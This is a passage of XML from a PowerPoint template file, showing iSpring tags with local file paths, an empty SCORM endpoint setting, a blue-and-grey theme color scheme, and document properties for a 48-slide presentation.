      <p:bldP spid="2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UUID" val="{C1A8F295-47DC-48FB-81BD-666766343352}"/>
  <p:tag name="ISPRING_RESOURCE_FOLDER" val="E:\素材\正版图-卖\PPT\0变色龙\0包图网\bt369\ppt\bt369\"/>
  <p:tag name="ISPRING_PRESENTATION_PATH" val="E:\素材\正版图-卖\PPT\0变色龙\0包图网\bt369\ppt\bt369.pptx"/>
  <p:tag name="ISPRING_PROJECT_FOLDER_UPDATED" val="1"/>
  <p:tag name="ISPRING_SCREEN_RECS_UPDATED" val="E:\素材\正版图-卖\PPT\0变色龙\0包图网\bt369\ppt\bt369"/>
  <p:tag name="ISPRING_SCORM_ENDPOINT" val="&lt;endpoint&gt;&lt;enable&gt;0&lt;/enable&gt;&lt;lrs&gt;http://&lt;/lrs&gt;&lt;auth&gt;0&lt;/auth&gt;&lt;login&gt;&lt;/login&gt;&lt;password&gt;&lt;/password&gt;&lt;key&gt;&lt;/key&gt;&lt;name&gt;&lt;/name&gt;&lt;email&gt;&lt;/email&gt;&lt;/endpoint&gt;&#10;"/>
  <p:tag name="ISPRING_PRESENTATION_TITLE" val="bt1191"/>
</p:tagLst>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Office Theme">
  <a:themeElements>
    <a:clrScheme name="自定义 386">
      <a:dk1>
        <a:sysClr val="windowText" lastClr="000000"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="29ABE2"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="E7E6E6"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="29ABE2"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="C8C8C8"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="29ABE2"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="C8C8C8"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="29ABE2"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="C8C8C8"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="29ABE2"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="C8C8C8"/>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4191</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>自定义</PresentationFormat>
  <Paragraphs>324</Paragraphs>
  <Slides>48</Slides>
  <Notes>48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48</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="55" baseType="lpstr">
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</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bt1191</dc:title>
  <dc:creator/>
  <cp:lastModifiedBy/>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-02-21T13:09:17Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-02-09T10:57:29Z</dcterms:modified>
</cp:coreProperties>
</file>